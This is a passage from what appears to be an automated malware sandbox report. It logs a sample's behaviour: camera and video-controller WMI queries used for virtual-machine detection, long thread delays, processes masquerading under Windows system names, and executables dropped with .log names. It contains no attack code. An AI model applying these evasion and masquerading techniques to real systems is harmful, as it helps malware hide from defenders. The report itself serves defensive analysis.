                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 2480000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 1A640000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeMemory allocated: D10000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeMemory allocated: 1A970000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeMemory allocated: 19C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeMemory allocated: 1B350000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 3190000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 1400000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 1B170000 memory reserve | memory write watch
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMemory allocated: 1900000 memory reserve | memory write watch
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMemory allocated: 1B320000 memory reserve | memory write watch
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMemory allocated: 1A70000 memory reserve | memory write watch
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMemory allocated: 1B4F0000 memory reserve | memory write watch
                              Source: C:\Users\Default\SystemSettings.exeMemory allocated: D60000 memory reserve | memory write watch
                              Source: C:\Users\Default\SystemSettings.exeMemory allocated: 1AAC0000 memory reserve | memory write watch
                              Source: C:\Users\Default\SystemSettings.exeMemory allocated: 1860000 memory reserve | memory write watch
                              Source: C:\Users\Default\SystemSettings.exeMemory allocated: 1E90000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: A80000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\lv961v43L3.exeMemory allocated: 1A7F0000 memory reserve | memory write watch
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeMemory allocated: 1180000 memory reserve | memory write watch
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeMemory allocated: 1AE50000 memory reserve | memory write watch
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMemory allocated: 3260000 memory reserve | memory write watch
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeMemory allocated: 1B480000 memory reserve | memory write watch
                              Source: C:\Users\Default\SystemSettings.exeMemory allocated: 2B60000 memory reserve | memory write watch
                              Source: C:\Users\Default\SystemSettings.exeMemory allocated: 1AD40000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\Default\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\Default\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\lv961v43L3.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 600000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599844
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599641
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599344
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599156
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 599016
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598891
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598778
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598633
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598516
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598406
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598297
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598188
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 598053
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 300000
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597916
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597797
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597686
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597575
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597317
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597188
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 597078
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596969
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596859
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596750
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596641
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596531
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596422
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596313
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeThread delayed: delay time: 596199
                              Source: C:\Users\Default\SystemSettings.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWindow / User API: threadDelayed 4180
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWindow / User API: threadDelayed 5474
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\oTYKBhgS.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\gBplMliu.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\ExWQYAoA.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zpwiWXhy.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\DBipIDSx.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\QaswzdXY.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\XuBMTZHB.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\UQjmGZYR.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ekFuRFbl.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\HkLqVmri.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ysVaBXSD.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\yHDAltbA.logJump to dropped file
                              Source: C:\Users\user\Desktop\lv961v43L3.exeDropped PE file which has not been started: C:\Users\user\Desktop\xIFQfYNI.logJump to dropped file
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\SzzvMtRI.logJump to dropped file
